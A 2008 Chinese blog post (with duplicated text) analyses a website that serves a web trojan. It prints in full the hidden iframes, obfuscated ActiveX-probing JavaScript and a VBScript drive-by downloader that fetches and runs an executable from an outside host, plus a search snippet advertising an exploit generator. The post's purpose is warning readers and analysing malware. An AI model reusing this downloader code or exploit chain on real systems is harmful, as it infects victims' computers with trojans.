无
今天看了一下thinkphp的說明文檔
2008/02/11 12:55 | by
http://www.050520.cn
可人官方网站 -- 会员中心 - 可人远程强制视频监控软件 -- 高效 稳定 免费
看到这文字,应该很让人激动
而且还有flash教程
然后呢,打开首页看他的源码
最后面出现了
这个是什么页呢?
在看源码
接着在打开
http://1.100190.com/d/d.htm
可以看到
上面有一个MS06014,我们看一下在baidu里找这个红色的字就知道了
如果在打开这个页面呢?
可以看到一段vb的角本,其中还有一个 http://1.111281.com/down.exe 的下载地址
下载这个exe文件
然后,看一看微点报什么!
木马名称:Trojan-Downloader.Win32.EDog.q
程序:
C:\WINDOWS\SYSTEM32\DRIVERS\PCIHDD2.SYS
是木马程序!
已成功阻止其运行,是否要删除此文件?
木马名称:Trojan-Downloader.Win32.EDog.r
程序:
C:\WINDOWS\SYSTEM32\DRIVERS\ATI32SRV.SYS
是木马程序!
已成功阻止其运行,是否要删除此文件?
程序:
C:\TEMPORARY INTERNET FILES\CONTENT.IE5\0LKB8B0F\DOWN[1].EXE
木马程序生成以下文件:
1) C:\WINDOWS\SYSTEM32\LSSASS.EXE
2) C:\WINDOWS\SYSTEM32\HDDGUARD.DLL
是否删除木马程序及其衍生物?
这里有用到一个QQ 784378237 在看一下这个人的 QQ
这个是用object,来注册这个木马程序,达到下马的目的了
下面是这个QQ的资料
这个跟以前风云的论坛被人下了木马差不多!
最后请朋友们记住 可人远程强制视频监控软件 这个是一个传播木马的网址
运行Exe后,QQ医生不能运行!
要升级到最新的程序!
作者:Else 's Blog
地址:http://www.aixq.com/post/934/
版权所有。转载时必须链接形式注明作者和原始出处及本声明! 在
中查看更多“又是一个下马的网站”相关内容
在
中查看更多“又是一个下马的网站”相关内容
在
中查看更多“又是一个下马的网站”相关内容
在
中查看更多“又是一个下马的网站”相关内容
在
中查看更多“又是一个下马的网站”相关内容
在
中查看更多“又是一个下马的网站”相关内容
最后编辑: Else 编辑于2008/02/11 14:40
可人官方网站 -- 会员中心 - 可人远程强制视频监控软件 -- 高效 稳定 免费
看到这文字,应该很让人激动
而且还有flash教程
然后呢,打开首页看他的源码
最后面出现了
<iframe src=http://1.100190.com/g3.htm width=100 height=0></iframe>
这个是什么页呢?
在看源码
<iframe src=http://1.100190.com/d/d.htm width=100 height=0></iframe>
接着在打开
http://1.100190.com/d/d.htm
可以看到
<Html>
<Body>
<noscript>
<iframe src=*></iframe>
</noscript>
<script language="javaScript">
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('Cuteqqsx')==-1){
var id="classid";
var ids="clsid:BD96C556-65A3-11";
var idss="D0-983A-00C04FC29E36";
var idx=ids+idss;
try{
var e;
var ado=(document["createElement"]("object"));
ado["setAttribute"](id,idx);
var as=window["ado"]["createobject"]("A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+1*60*60*1000);
document.cookie='Cuteqqsx=qq784378237s;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Ajax.gif><\/script>")
document.write("<iframe width='0' height='0' src='http://1.100190.com/d/Ms06014.htm'></iframe>")}
else{
try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1");}
catch(r){};
finally{if(r!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Real.js><\/script>")}}
try{var g;var storm=new window["ActiveXObject"]("MPS.StormPlayer");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Bfyy.gif><\/script>")}}
try{var h;var pps=new window["ActiveXObject"]("POWERPLAYER.PowerPlayerCtrl.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Pps.gif><\/script>")}}
try{var i;var thunder=new window["ActiveXObject"]("DPClient.Vod");}
catch(i){};
finally{if(i!="[object Error]"){
document.write("<script src=http://1.100190.com/d/XunLei.gif><\/script>")}}
try{var j;var lianzhong=new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1");}
catch(j){};
finally{if(j!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Lz.gif><\/script>")}
if(r=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){
document.write("<iframe width='0' height='0' src='http://1.100190.com/d/QVod.html'></iframe>")}}
}}}
</script>
</Body>
</Html>
<Body>
<noscript>
<iframe src=*></iframe>
</noscript>
<script language="javaScript">
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('Cuteqqsx')==-1){
var id="classid";
var ids="clsid:BD96C556-65A3-11";
var idss="D0-983A-00C04FC29E36";
var idx=ids+idss;
try{
var e;
var ado=(document["createElement"]("object"));
ado["setAttribute"](id,idx);
var as=window["ado"]["createobject"]("A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+1*60*60*1000);
document.cookie='Cuteqqsx=qq784378237s;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Ajax.gif><\/script>")
document.write("<iframe width='0' height='0' src='http://1.100190.com/d/Ms06014.htm'></iframe>")}
else{
try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1");}
catch(r){};
finally{if(r!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Real.js><\/script>")}}
try{var g;var storm=new window["ActiveXObject"]("MPS.StormPlayer");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Bfyy.gif><\/script>")}}
try{var h;var pps=new window["ActiveXObject"]("POWERPLAYER.PowerPlayerCtrl.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Pps.gif><\/script>")}}
try{var i;var thunder=new window["ActiveXObject"]("DPClient.Vod");}
catch(i){};
finally{if(i!="[object Error]"){
document.write("<script src=http://1.100190.com/d/XunLei.gif><\/script>")}}
try{var j;var lianzhong=new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1");}
catch(j){};
finally{if(j!="[object Error]"){
document.write("<script src=http://1.100190.com/d/Lz.gif><\/script>")}
if(r=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){
document.write("<iframe width='0' height='0' src='http://1.100190.com/d/QVod.html'></iframe>")}}
}}}
</script>
</Body>
</Html>
上面有一个MS06014,我们看一下在baidu里找这个红色的字就知道了
MS06014网马 - 华夏黑客同盟 - http://www.77169.com
MS06014网马生成器 MS06014网马生成器 * 如果您下载有问题:要做的事情 一,请确定您支持FTP下载 二,请多刷新几次 三,给管理员留言. 注意:解压密码:www.77169.com 或者 www.77169.org* 如果是下载黑客相关软件,请注意自行杀毒!* ...
soft.77169.com/HTML/26586.html 55K 2007-9-11 - 百度快照
soft.77169.com 上的更多结果
MS06014网马生成器 MS06014网马生成器 * 如果您下载有问题:要做的事情 一,请确定您支持FTP下载 二,请多刷新几次 三,给管理员留言. 注意:解压密码:www.77169.com 或者 www.77169.org* 如果是下载黑客相关软件,请注意自行杀毒!* ...
soft.77169.com/HTML/26586.html 55K 2007-9-11 - 百度快照
soft.77169.com 上的更多结果
如果在打开这个页面呢?
可以看到一段vb的角本,其中还有一个 http://1.111281.com/down.exe 的下载地址
<script language=VBScript>
On Error Resume Next
cuteqq = "http://1.111281.com/down.exe"
Set cuteqq2 = document.createElement("object")
cuteqqid="clsid:"
cuteqqidx="BD96"
cuteqqid2="C556-65"
cuteqqid3="A3-11D"
cuteqqid4="0-98"
cuteqqid5="3A-00C"
cuteqqid6="04FC"
cuteqqid7="29E"
cuteqqid8="36"
cuteqq3="Microsoft.X"
cuteqq4="MLHTTp"
cuteqq5="G"
cuteqq6="E"
cuteqq7="T"
cuteqq2.SetAttribute "classid", cuteqqid&cuteqqidx&cuteqqid2&cuteqqid3&cuteqqid4&cuteqqid5&cuteqqid6&cuteqqid7&cuteqqid8
Set lovecuteqq=cuteqq2.CreateObject(cuteqq3&cuteqq4,"")
lovecuteqq.Open cuteqq5&cuteqq6&cuteqq7, cuteqq, False
lovecuteqq.Send
Cuteqq_784378237="MicroSofts.pif"
Cuteqq_784378237s="MicroSofts.vbs"
Q784378237="Scripting."
Q784378237s="FileSyst"
Q784378237ss="emObject"
Q784378237sss="Adod"
Q784378237ssss="b.stream"
Q784378237sssss=Q784378237sss&Q784378237ssss
Set chilam = cuteqq2.createobject(Q784378237&Q784378237s&Q784378237ss,"")
Set yingying = chilam.GetSpecialFolder(2)
Cuteqq_784378237=chilam.BuildPath(yingying,Cuteqq_784378237)
Cuteqq_784378237s=chilam.BuildPath(yingying,Cuteqq_784378237s)
Set chilams = cuteqq2.createobject(Q784378237sssss,"")
chilams.type=1
chilams.Open
chilams.Write lovecuteqq.ResponseBody
chilams.Savetofile Cuteqq_784378237,2
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "Set Lovecuteqq = CreateObject(""Wscript"&".Shell"")"&vbCrLf&"Lovecuteqq.run ("""&Cuteqq_784378237&""")"
chilams.Savetofile Cuteqq_784378237s,2
chilams.Close
cute="Shell.Applica"
qq="tion"
Set cute_qq = cuteqq2.createobject(cute&qq,"")
Qq784378237="O"
Qq784378237s="p"
Qq784378237ss="e"
Qq784378237sss="n"
cute_qq.SheLlExecute Cuteqq_784378237s,"","",Qq784378237&Qq784378237s&Qq784378237ss&Qq784378237sss,0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
On Error Resume Next
cuteqq = "http://1.111281.com/down.exe"
Set cuteqq2 = document.createElement("object")
cuteqqid="clsid:"
cuteqqidx="BD96"
cuteqqid2="C556-65"
cuteqqid3="A3-11D"
cuteqqid4="0-98"
cuteqqid5="3A-00C"
cuteqqid6="04FC"
cuteqqid7="29E"
cuteqqid8="36"
cuteqq3="Microsoft.X"
cuteqq4="MLHTTp"
cuteqq5="G"
cuteqq6="E"
cuteqq7="T"
cuteqq2.SetAttribute "classid", cuteqqid&cuteqqidx&cuteqqid2&cuteqqid3&cuteqqid4&cuteqqid5&cuteqqid6&cuteqqid7&cuteqqid8
Set lovecuteqq=cuteqq2.CreateObject(cuteqq3&cuteqq4,"")
lovecuteqq.Open cuteqq5&cuteqq6&cuteqq7, cuteqq, False
lovecuteqq.Send
Cuteqq_784378237="MicroSofts.pif"
Cuteqq_784378237s="MicroSofts.vbs"
Q784378237="Scripting."
Q784378237s="FileSyst"
Q784378237ss="emObject"
Q784378237sss="Adod"
Q784378237ssss="b.stream"
Q784378237sssss=Q784378237sss&Q784378237ssss
Set chilam = cuteqq2.createobject(Q784378237&Q784378237s&Q784378237ss,"")
Set yingying = chilam.GetSpecialFolder(2)
Cuteqq_784378237=chilam.BuildPath(yingying,Cuteqq_784378237)
Cuteqq_784378237s=chilam.BuildPath(yingying,Cuteqq_784378237s)
Set chilams = cuteqq2.createobject(Q784378237sssss,"")
chilams.type=1
chilams.Open
chilams.Write lovecuteqq.ResponseBody
chilams.Savetofile Cuteqq_784378237,2
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "Set Lovecuteqq = CreateObject(""Wscript"&".Shell"")"&vbCrLf&"Lovecuteqq.run ("""&Cuteqq_784378237&""")"
chilams.Savetofile Cuteqq_784378237s,2
chilams.Close
cute="Shell.Applica"
qq="tion"
Set cute_qq = cuteqq2.createobject(cute&qq,"")
Qq784378237="O"
Qq784378237s="p"
Qq784378237ss="e"
Qq784378237sss="n"
cute_qq.SheLlExecute Cuteqq_784378237s,"","",Qq784378237&Qq784378237s&Qq784378237ss&Qq784378237sss,0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
下载这个exe文件
然后,看一看微点报什么!
引用
木马名称:Trojan-Downloader.Win32.EDog.q
程序:
C:\WINDOWS\SYSTEM32\DRIVERS\PCIHDD2.SYS
是木马程序!
已成功阻止其运行,是否要删除此文件?
木马名称:Trojan-Downloader.Win32.EDog.r
程序:
C:\WINDOWS\SYSTEM32\DRIVERS\ATI32SRV.SYS
是木马程序!
已成功阻止其运行,是否要删除此文件?
程序:
C:\TEMPORARY INTERNET FILES\CONTENT.IE5\0LKB8B0F\DOWN[1].EXE
木马程序生成以下文件:
1) C:\WINDOWS\SYSTEM32\LSSASS.EXE
2) C:\WINDOWS\SYSTEM32\HDDGUARD.DLL
是否删除木马程序及其衍生物?
这里有用到一个QQ 784378237 在看一下这个人的 QQ
这个是用object,来注册这个木马程序,达到下马的目的了
下面是这个QQ的资料
引用
Http://Www.CuteQq.Cn (难道是一个盗QQ的?)
客户至上,用心服务
走正规流程,先贷后钱,用户买得放心,用得开心!
本站软件已全面支持淘宝交易 Http://shop33734358.taobao.com
客户至上,用心服务
走正规流程,先贷后钱,用户买得放心,用得开心!
本站软件已全面支持淘宝交易 Http://shop33734358.taobao.com
这个跟以前风云的论坛被人下了木马差不多!
最后请朋友们记住 可人远程强制视频监控软件 这个是一个传播木马的网址
运行Exe后,QQ医生不能运行!
要升级到最新的程序!
作者:Else 's Blog
地址:http://www.aixq.com/post/934/
版权所有。转载时必须链接形式注明作者和原始出处及本声明!
中查看更多“又是一个下马的网站”相关内容中查看更多“又是一个下马的网站”相关内容中查看更多“又是一个下马的网站”相关内容中查看更多“又是一个下马的网站”相关内容中查看更多“又是一个下马的网站”相关内容中查看更多“又是一个下马的网站”相关内容最后编辑: Else 编辑于2008/02/11 14:40
安装微点看一看!
难道是点了论坛人的签名…………
看了一下,赶紧关了。